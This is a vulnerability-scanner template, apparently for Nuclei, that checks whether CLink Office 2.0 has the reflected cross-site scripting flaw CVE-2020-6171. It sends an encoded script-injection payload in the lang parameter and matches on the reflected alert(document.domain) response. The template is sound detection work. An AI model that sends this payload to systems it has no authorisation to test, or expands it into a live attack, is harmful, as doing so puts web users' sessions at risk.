45 lines
1.2 KiB
YAML
45 lines
1.2 KiB
YAML
id: CVE-2020-6171
|
|
|
|
info:
|
|
name: CLink Office 2.0 - Cross-Site Scripting
|
|
author: pikpikcu
|
|
severity: medium
|
|
description: |
|
|
CLink Office 2.0 is vulnerable to cross-site scripting in the index page of the management console and allows remote attackers to inject arbitrary web script or HTML via the lang parameter.
|
|
reference:
|
|
- https://www.deepcode.ca/index.php/2020/04/07/cve-2020-xss-in-clink-office-v2/
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2020-6171
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
cvss-score: 6.1
|
|
cve-id: CVE-2020-6171
|
|
cwe-id: CWE-79
|
|
cpe: cpe:2.3:a:communilink:clink_office:*:*:*:*:*:*:*:*
|
|
epss-score: 0.00135
|
|
tags: cve,cve2020,xss,clink-office
|
|
metadata:
|
|
max-request: 1
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}?lang=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3Cp%20class=%22&p=1"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
words:
|
|
- '"></script><script>alert(document.domain)</script>'
|
|
part: body
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- text/html
|
|
|
|
# Enhanced by mp on 2022/08/15
|